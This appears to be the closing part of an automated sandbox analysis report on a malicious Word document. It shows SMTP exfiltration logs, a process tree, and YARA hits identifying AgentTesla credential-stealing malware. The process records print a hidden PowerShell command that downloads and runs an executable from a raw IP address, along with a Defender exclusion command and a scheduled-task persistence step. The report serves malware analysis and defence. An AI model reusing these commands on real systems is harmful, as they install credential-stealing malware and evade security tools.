                                                                                                              Nov 25, 2021 18:16:00.456043005 CET58749168208.91.199.225192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:00.456239939 CET49168587192.168.2.22208.91.199.225AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:00.609339952 CET58749168208.91.199.225192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:00.764110088 CET58749168208.91.199.225192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:00.764594078 CET49168587192.168.2.22208.91.199.225MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:00.918028116 CET58749168208.91.199.225192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:00.918572903 CET49168587192.168.2.22208.91.199.225RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:01.078608990 CET58749168208.91.199.225192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:01.079021931 CET49168587192.168.2.22208.91.199.225DATA
                                                                                                              Nov 25, 2021 18:16:01.231420994 CET58749168208.91.199.225192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:02.157263994 CET49168587192.168.2.22208.91.199.225.
                                                                                                              Nov 25, 2021 18:16:02.454163074 CET58749168208.91.199.225192.168.2.22250 2.0.0 Ok: queued as 00FA11D7F9C
                                                                                                              Nov 25, 2021 18:16:12.105878115 CET49168587192.168.2.22208.91.199.225QUIT
                                                                                                              Nov 25, 2021 18:16:12.258209944 CET58749168208.91.199.225192.168.2.22221 2.0.0 Bye
                                                                                                              Nov 25, 2021 18:16:12.800467968 CET58749169208.91.199.223192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:12.800950050 CET49169587192.168.2.22208.91.199.223EHLO 141700
                                                                                                              Nov 25, 2021 18:16:12.952631950 CET58749169208.91.199.223192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:12.952924013 CET49169587192.168.2.22208.91.199.223AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:13.106471062 CET58749169208.91.199.223192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:13.261068106 CET58749169208.91.199.223192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:13.261806011 CET49169587192.168.2.22208.91.199.223MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:13.414693117 CET58749169208.91.199.223192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:13.415137053 CET49169587192.168.2.22208.91.199.223RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:13.579514980 CET58749169208.91.199.223192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:13.580049038 CET49169587192.168.2.22208.91.199.223DATA
                                                                                                              Nov 25, 2021 18:16:13.732167006 CET58749169208.91.199.223192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:15.341310978 CET58749169208.91.199.223192.168.2.22250 2.0.0 Ok: queued as 7AAA4DA296
                                                                                                              Nov 25, 2021 18:16:21.787130117 CET58749170208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:47.266040087 CET58749172208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:47.266547918 CET49172587192.168.2.22208.91.199.224EHLO 141700
                                                                                                              Nov 25, 2021 18:16:47.411499023 CET58749172208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:47.412118912 CET49172587192.168.2.22208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:47.557813883 CET58749172208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:47.708725929 CET58749172208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:47.709115028 CET49172587192.168.2.22208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:47.857166052 CET58749172208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:47.857582092 CET49172587192.168.2.22208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:48.021215916 CET58749172208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:48.021595001 CET49172587192.168.2.22208.91.199.224DATA
                                                                                                              Nov 25, 2021 18:16:48.166672945 CET58749172208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:49.666822910 CET58749172208.91.199.224192.168.2.22250 2.0.0 Ok: queued as E66333A1B18
                                                                                                              Nov 25, 2021 18:16:55.161237001 CET49172587192.168.2.22208.91.199.224QUIT
                                                                                                              Nov 25, 2021 18:16:55.306260109 CET58749172208.91.199.224192.168.2.22221 2.0.0 Bye
                                                                                                              Nov 25, 2021 18:16:55.699424982 CET58749173208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:55.699944973 CET49173587192.168.2.22208.91.199.224EHLO 141700
                                                                                                              Nov 25, 2021 18:16:55.844575882 CET58749173208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:55.845048904 CET49173587192.168.2.22208.91.199.224AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:55.990134954 CET58749173208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:56.137636900 CET58749173208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:56.138192892 CET49173587192.168.2.22208.91.199.224MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:56.283674955 CET58749173208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:56.284219980 CET49173587192.168.2.22208.91.199.224RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:56.354336977 CET49169587192.168.2.22208.91.199.223QUIT
                                                                                                              Nov 25, 2021 18:16:56.464593887 CET58749173208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:56.465066910 CET49173587192.168.2.22208.91.199.224DATA
                                                                                                              Nov 25, 2021 18:16:56.506661892 CET58749169208.91.199.223192.168.2.22221 2.0.0 Bye
                                                                                                              Nov 25, 2021 18:16:56.609827995 CET58749173208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:56.613157988 CET49173587192.168.2.22208.91.199.224.
                                                                                                              Nov 25, 2021 18:16:56.853490114 CET58749173208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 5A7EC3A1B1C
                                                                                                              Nov 25, 2021 18:16:56.962841034 CET58749174208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                              Nov 25, 2021 18:16:56.963052034 CET49174587192.168.2.22208.91.198.143EHLO 141700
                                                                                                              Nov 25, 2021 18:16:57.112601995 CET58749174208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                              250-PIPELINING
                                                                                                              250-SIZE 41648128
                                                                                                              250-VRFY
                                                                                                              250-ETRN
                                                                                                              250-STARTTLS
                                                                                                              250-AUTH PLAIN LOGIN
                                                                                                              250-AUTH=PLAIN LOGIN
                                                                                                              250-ENHANCEDSTATUSCODES
                                                                                                              250-8BITMIME
                                                                                                              250 DSN
                                                                                                              Nov 25, 2021 18:16:57.113282919 CET49174587192.168.2.22208.91.198.143AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
                                                                                                              Nov 25, 2021 18:16:57.263832092 CET58749174208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                              Nov 25, 2021 18:16:57.416347027 CET58749174208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                              Nov 25, 2021 18:16:57.416778088 CET49174587192.168.2.22208.91.198.143MAIL FROM:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:57.567409992 CET58749174208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                              Nov 25, 2021 18:16:57.568006992 CET49174587192.168.2.22208.91.198.143RCPT TO:<m-konieczny@europecell.eu>
                                                                                                              Nov 25, 2021 18:16:57.732752085 CET58749174208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                              Nov 25, 2021 18:16:57.733259916 CET49174587192.168.2.22208.91.198.143DATA
                                                                                                              Nov 25, 2021 18:16:57.882982016 CET58749174208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                              Nov 25, 2021 18:16:59.406790972 CET58749174208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 9F9E878224E
                                                                                                              Nov 25, 2021 18:16:59.774890900 CET58749174208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 9F9E878224E

                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: WINWORD.EXE PID: 236 Parent PID: 596

                                                                                                              General

                                                                                                              Start time:18:14:15
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                              Imagebase:0x13f670000
                                                                                                              File size:1423704 bytes
                                                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: powershell.exe PID: 1592 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:20
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                                                                                                              Imagebase:0x13f770000
                                                                                                              File size:473600 bytes
                                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                              Reputation:high

                                                                                                              Analysis Process: powershell.exe PID: 2804 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:21
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                                                                                                              Imagebase:0x13f770000
                                                                                                              File size:473600 bytes
                                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                              Reputation:high

                                                                                                              Analysis Process: powershell.exe PID: 2968 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:21
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
                                                                                                              Imagebase:0x13f770000
                                                                                                              File size:473600 bytes
                                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Analysis Process: taskmg.exe PID: 1156 Parent PID: 1592

                                                                                                              General

                                                                                                              Start time:18:14:26
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\taskmg.exe"
                                                                                                              Imagebase:0x12d0000
                                                                                                              File size:777216 bytes
                                                                                                              MD5 hash:815982590DE5E574ABB8A0310826E200
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Analysis Process: powershell.exe PID: 2924 Parent PID: 1156

                                                                                                              General

                                                                                                              Start time:18:14:29
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
                                                                                                              Imagebase:0x22300000
                                                                                                              File size:452608 bytes
                                                                                                              MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Analysis Process: schtasks.exe PID: 1176 Parent PID: 1156

                                                                                                              General

                                                                                                              Start time:18:14:30
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
                                                                                                              Imagebase:0xde0000
                                                                                                              File size:179712 bytes
                                                                                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: taskmg.exe PID: 2784 Parent PID: 1156

                                                                                                              General

                                                                                                              Start time:18:14:34
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\taskmg.exe
                                                                                                              Imagebase:0x12d0000
                                                                                                              File size:777216 bytes
                                                                                                              MD5 hash:815982590DE5E574ABB8A0310826E200
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              Analysis Process: verclsid.exe PID: 1200 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:39
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\verclsid.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                                                                              Imagebase:0xffa10000
                                                                                                              File size:11776 bytes
                                                                                                              MD5 hash:3796AE13F680D9239210513EDA590E86
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: notepad.exe PID: 2856 Parent PID: 236

                                                                                                              General

                                                                                                              Start time:18:14:41
                                                                                                              Start date:25/11/2021
                                                                                                              Path:C:\Windows\System32\notepad.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                                                                                                              Imagebase:0xffe30000
                                                                                                              File size:193536 bytes
                                                                                                              MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >